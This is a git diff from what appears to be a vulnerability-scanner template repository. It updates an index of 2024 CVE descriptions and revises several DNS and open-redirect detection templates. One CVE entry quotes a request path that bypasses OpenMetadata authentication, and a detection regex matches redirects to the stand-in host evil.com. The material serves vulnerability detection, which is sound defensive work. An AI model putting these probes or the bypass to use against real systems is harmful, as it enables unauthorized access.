{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
+{"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
+{"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"}
+{"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"}
+{"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"}
+{"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"}
+{"ID":"CVE-2024-24919","Info":{"Name":"Check Point Quantum Gateway - Information Disclosure","Severity":"high","Description":"CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-24919.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
+{"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"}
{"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"}
{"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"}
+{"ID":"CVE-2024-27348","Info":{"Name":"Apache HugeGraph-Server - Remote Command Execution","Severity":"high","Description":"Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27348.yaml"}
{"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"}
{"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"}
{"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"}
+{"ID":"CVE-2024-27956","Info":{"Name":"WordPress Automatic Plugin \u003c= 3.92.0 - SQL Injection","Severity":"critical","Description":"The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-27956.yaml"}
{"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"}
{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"}
-{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
+{"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"}
+{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"}
{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"}
{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"}
-{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
+{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"}
+{"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"}
+{"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"}
+{"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"}
+{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"}
+{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"}
+{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"}
+{"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"}
+{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"}
+{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
+{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
+{"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"}
+{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"}
+{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
+{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
+{"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"}
+{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
+{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
+{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
+{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
+{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
+{"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"}
+{"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index cc5b80a342..a6bfebd6fa 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-e282d2f6d6a62a9204758d9b8884ea4f
+b850ce0a43b8e25fcc5d4b47a2edd438
diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml
index d06fd5dde9..8c36036bcc 100644
--- a/dast/vulnerabilities/redirect/open-redirect.yaml
+++ b/dast/vulnerabilities/redirect/open-redirect.yaml
@@ -2,7 +2,7 @@ id: open-redirect
info:
name: Open Redirect Detection
- author: princechaddha
+ author: princechaddha,AmirHossein Raeisi
severity: medium
tags: redirect,dast
@@ -172,11 +172,11 @@ http:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
- type: status
status:
- 301
- 302
- 307
-# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml
index c7c350400a..a3bf3add6e 100644
--- a/dns/azure-takeover-detection.yaml
+++ b/dns/azure-takeover-detection.yaml
@@ -4,7 +4,7 @@ info:
name: Microsoft Azure Takeover Detection
author: pdteam
severity: high
- description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource.
+ description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D>
reference:
- https://godiego.co/posts/STO/
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
@@ -25,33 +25,30 @@ dns:
matchers:
- type: word
words:
- - "azure-api.net"
- - "azure-mobile.net"
- - "azurecontainer.io"
- - "azurecr.io"
- - "azuredatalakestore.net"
- - "azureedge.net"
- - "azurefd.net"
- - "azurehdinsight.net"
- - "azurewebsites.net"
- - "azurewebsites.windows.net"
- - "blob.core.windows.net"
- - "cloudapp.azure.com"
- - "cloudapp.net"
- - "database.windows.net"
- - "redis.cache.windows.net"
- - "search.windows.net"
- - "servicebus.windows.net"
- - "trafficmanager.net"
- - "visualstudio.com"
-
- - type: word
- words:
- - "NXDOMAIN"
-
+ - NXDOMAIN
+ - type: dsl
+ dsl:
+ - 'contains(cname, "azure-api.net")'
+ - 'contains(cname, "azure-mobile.net")'
+ - 'contains(cname, "azurecontainer.io")'
+ - 'contains(cname, "azurecr.io")'
+ - 'contains(cname, "azuredatalakestore.net")'
+ - 'contains(cname, "azureedge.net")'
+ - 'contains(cname, "azurefd.net")'
+ - 'contains(cname, "azurehdinsight.net")'
+ - 'contains(cname, "azurewebsites.net")'
+ - 'contains(cname, "azurewebsites.windows.net")'
+ - 'contains(cname, "blob.core.windows.net")'
+ - 'contains(cname, "cloudapp.azure.com")'
+ - 'contains(cname, "cloudapp.net")'
+ - 'contains(cname, "database.windows.net")'
+ - 'contains(cname, "redis.cache.windows.net")'
+ - 'contains(cname, "search.windows.net")'
+ - 'contains(cname, "servicebus.windows.net")'
+ - 'contains(cname, "trafficmanager.net")'
+ - 'contains(cname, "visualstudio.com")'
extractors:
- type: dsl
dsl:
- cname
-
-# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d68568731abdd8cfc97f8e47d3886209656605e7c73bfe62944a9d0d440bdd0d0221009fbd2c17dbd3f8faf9eae5e17223431a603a59249c6d151b36f22bbd4723ad6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml
new file mode 100644
index 0000000000..3a3c25aae2
--- /dev/null
+++ b/dns/bimi-detect.yaml
@@ -0,0 +1,25 @@
+id: bimi-record-detect
+
+info:
+ name: BIMI Record - Detection
+ author: rxerium
+ severity: info
+ description: |
+ A BIMI record was detected
+ reference:
+ - https://postmarkapp.com/blog/what-the-heck-is-bimi
+ tags: dns,bimi
+
+dns:
+ - name: "{{FQDN}}"
+ type: TXT
+ matchers:
+ - type: word
+ words:
+ - "v=BIMI1"
+
+ extractors:
+ - type: regex
+ regex:
+ - "v=BIMI1(.+)"
+# digest: 4a0a004730450221008445fc238e87f9342ce983f65c136755a858f4b59106a74fe0a685b7cbc0d9d20220723212d91ee35908c09375b9eef99966b5c4e47ca3d5dab26b2013f76ff5891e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml
index 05aaa5c995..49522e2bc7 100644
--- a/dns/dns-waf-detect.yaml
+++ b/dns/dns-waf-detect.yaml
@@ -193,4 +193,9 @@ dns:
words:
- ".iidns.com"
-# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950
+ - type: word
+ part: answer
+ name: ksyun
+ words:
+ - ".ksyunwaf.com"
+# digest: 490a00463044022005bf81b04ee9a74169b2ea8baf29b776c3da72d7bf13cdf16f62a84baa003daf0220758d7619504e7c6a45cc29f1e7f3c71f7cbba93b4444cf419ddc9b01d486d265:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml
index 0b15fdd4d3..6d214d0b04 100644
--- a/file/malware/cerberus-malware.yaml
+++ b/file/malware/cerberus-malware.yaml
